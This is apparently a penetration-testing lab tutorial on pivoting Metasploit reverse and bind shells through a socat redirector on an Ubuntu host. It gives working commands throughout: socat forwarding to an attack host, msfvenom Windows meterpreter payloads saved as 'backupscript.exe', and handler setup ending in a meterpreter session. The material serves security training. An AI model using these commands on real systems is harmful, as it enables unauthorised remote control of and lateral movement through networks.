Playing Pong with Socat
Socat Redirection with a Reverse Shell
Socat is a bidirectional relay tool that can create pipe sockets between 2
independent network channels without needing to use SSH tunneling.
We can start Metasploit's listener using the same command mentioned in the last section on our attack host, and we can start socat
on the Ubuntu server.
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
Socat will listen on localhost on port 8080
and forward all the traffic to port 80
on our attack host (10.10.14.18).
We then create a payload for the Windows target that points at the Ubuntu server running socat and start our multi_handler
on the attack machine
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<UbuntuIP> -f exe -o backupscript.exe LPORT=8080
(we need port 80)
sudo msfconsole
msf6 > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80
run
We can test this by running our payload on the windows host again, and we should see a network connection from the Ubuntu server this time.
Socat Redirection with a Bind Shell
Similar to our socat's reverse shell redirector, we can also create a socat bind shell redirector. This is different from reverse shells that connect back from the Windows server to the Ubuntu server and get redirected to our attack host.
In the case of bind shells, the Windows server will start a listener and bind to a particular port. We can create a bind shell payload for Windows and execute it on the Windows host.
At the same time, we can create a socat redirector on the Ubuntu server, which will listen for incoming connections from a Metasploit bind handler and forward that to a bind shell payload on a Windows target. The below figure should explain the pivot in a much better way.

Creating the Windows Payload
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
We can start a socat bind shell
listener, which listens on port 8080
and forwards packets to Windows server 8443
.
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
172.16.5.19
is the Windows IP
msf6 > use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.129.202.64
set LPORT 8080
run
Establishing Meterpreter Session
meterpreter > getuid
Last updated